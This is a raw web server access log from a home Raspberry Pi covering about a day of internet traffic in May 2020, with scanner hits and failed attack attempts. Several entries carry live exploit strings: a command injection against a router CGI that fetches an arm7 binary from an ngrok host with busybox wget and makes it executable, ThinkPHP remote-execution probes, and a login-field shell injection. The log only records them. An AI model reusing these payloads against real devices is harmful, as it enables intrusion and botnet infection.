Tue May 19 06:25:07 MDT 2020 06:25:07 up 84 days, 10:53, 1 user, load average: 0.39, 0.29, 0.23 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 84days 1:35m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE 187.190.246.249 - - [19/May/2020:12:53:24 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 187.190.246.249 - - [19/May/2020:12:53:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 52.25.56.15 - - [19/May/2020:13:50:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" 178.73.215.171 - - [19/May/2020:14:06:33 +0000] "GET / HTTP/1.0" 200 25000 "" "" 185.202.1.204 - - [19/May/2020:14:43:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 139.59.182.101 - - [19/May/2020:14:51:40 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 121.138.83.147 - - [19/May/2020:14:53:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 121.138.83.147 - - [19/May/2020:14:53:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 121.138.83.147 - - [19/May/2020:14:53:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 121.138.83.147 - - [19/May/2020:14:53:07 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 121.138.83.147 - - [19/May/2020:14:53:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.73.182.138 - - [19/May/2020:16:37:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 59.126.191.16 - - [19/May/2020:17:26:28 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 139.59.90.116 - - [19/May/2020:18:12:50 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 185.173.35.25 - - [19/May/2020:18:37:24 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 89.34.161.198 - - [19/May/2020:20:25:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 172.104.108.109 - - [19/May/2020:20:50:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0" 82.77.202.57 - - [19/May/2020:20:59:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 150.242.255.211 - - [19/May/2020:21:04:52 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 170.83.89.17 - - [19/May/2020:21:43:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 201.152.13.64 - - [19/May/2020:22:14:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.234.217.172 - - [19/May/2020:22:27:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 185.234.217.172 - - [19/May/2020:22:27:47 +0000] "GET /index.asp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 185.234.217.172 - - [19/May/2020:22:27:48 +0000] "GET /htmlV/welcomeMain.htm HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" 195.54.160.123 - - [19/May/2020:23:00:27 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 109.103.219.86 - - [19/May/2020:23:02:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 195.54.160.123 - - [19/May/2020:23:07:27 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [19/May/2020:23:07:27 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 195.54.160.123 - - [19/May/2020:23:20:13 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 67.205.132.118 - - [19/May/2020:23:54:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" 108.171.163.68 - - [20/May/2020:00:19:14 +0000] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 0 "" "curl/7.42.1" 138.99.216.112 - - [20/May/2020:00:35:48 +0000] "GET / HTTP/1.0" 200 25000 "" ""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"" 80.82.68.113 - - [20/May/2020:00:59:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.113 - - [20/May/2020:00:59:16 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 80.82.68.113 - - [20/May/2020:00:59:17 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 190.94.135.174 - - [20/May/2020:01:22:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 115.85.32.210 - - [20/May/2020:01:32:14 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 115.85.32.210 - - [20/May/2020:01:32:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 37.49.226.252 - - [20/May/2020:01:37:29 +0000] "GET / HTTP/1.1" 200 25000 "" "" 195.54.160.123 - - [20/May/2020:01:42:38 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.82.127.47 - - [20/May/2020:01:57:24 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 137.59.16.172 - - [20/May/2020:02:14:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" 43.229.95.235 - - [20/May/2020:03:15:19 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.105.89.161 - - [20/May/2020:03:39:41 +0000] "GET /0bef HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" 162.243.139.246 - - [20/May/2020:04:10:41 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 104.131.62.14 - - [20/May/2020:04:34:47 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 41.188.62.215 - - [20/May/2020:04:56:38 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0" 41.188.62.215 - - [20/May/2020:04:56:41 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 49.235.62.242 - - [20/May/2020:05:19:36 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 189.1.160.22 - - [20/May/2020:06:52:51 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 189.1.160.22 - - [20/May/2020:06:52:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 36.67.4.139 - - [20/May/2020:07:07:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 77.61.185.101 - - [20/May/2020:07:53:22 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC" 77.61.185.101 - - [20/May/2020:07:53:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 151.40.54.246 - - [20/May/2020:08:21:30 +0000] "GET / HTTP/1.1" 400 0 "" "" 62.240.12.3 - - [20/May/2020:08:49:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 2.191.215.253 - - [20/May/2020:09:06:21 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 2.191.215.253 - - [20/May/2020:09:06:23 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 103.115.125.169 - - [20/May/2020:09:20:30 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 200.70.33.244 - - [20/May/2020:09:54:48 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 162.243.144.141 - - [20/May/2020:09:59:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 104.248.229.14 - - [20/May/2020:10:12:34 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 187.95.208.242 - - [20/May/2020:10:33:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 52.28.65.98 - - [20/May/2020:11:10:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.3 Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/43.4" 49.4.31.138 - - [20/May/2020:11:44:41 +0000] "HEAD / HTTP/1.1" 200 0 "" "" 49.4.31.138 - - [20/May/2020:11:44:42 +0000] "GET / HTTP/1.1" 200 25000 "" "" 49.4.31.138 - - [20/May/2020:11:44:42 +0000] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 0 "" "" 178.93.2.101 - - [20/May/2020:12:02:50 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Wed May 20 06:25:08 MDT 2020 06:25:08 up 85 days, 10:53, 1 user, load average: 0.57, 0.31, 0.28 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 85days 1:35m 3.49s /usr/bin/lxsession -s LXDE-pi -e LXDE